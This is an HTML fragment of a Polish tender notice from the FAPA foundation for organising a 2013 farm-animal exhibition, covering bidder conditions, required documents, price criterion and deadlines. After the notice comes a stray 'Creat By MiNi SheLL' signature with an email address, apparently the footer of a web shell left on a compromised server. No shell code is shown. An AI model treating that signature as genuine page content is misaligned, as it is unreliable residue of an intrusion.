<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek ten za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy niż 3 lata - w tym okresie, należycie wykonał lub wykonuje, co najmniej 2 (dwie) usługi, o wartości co najmniej 160.000,00 zł każda (słownie: sto sześćdziesiąt tysięcy złotych 0/100), z których każda polegała na kompleksowej organizacji i realizacji wystawy zwierząt. Wykonanie jednej usługi jest równoznaczne z wykonaniem jednej umowy (jednego zamówienia na rzecz jednego Zamawiającego)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, w tym: a) co najmniej jedną osobą posiadającą doświadczenie w organizacji wystawy zwierząt hodowlanych, b) co najmniej trzy osoby posiadające wiedzę, co najmniej pięcioletnie doświadczenie, oraz kwalifikacje w zakresie niezbędnym do dokonania oceny zwierząt ras rodzimych na przedmiotowej wystawie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.fapa.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA
ul. Wspólna 30
00-930 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2013 godzina 10:00, miejsce: Fundacja Programów Pomocy dla Rolnictwa FAPA
ul. Wspólna 30
00-930 Warszawa
sekretariat - pok. 253.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Schemat III Pomocy Technicznej Programu Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com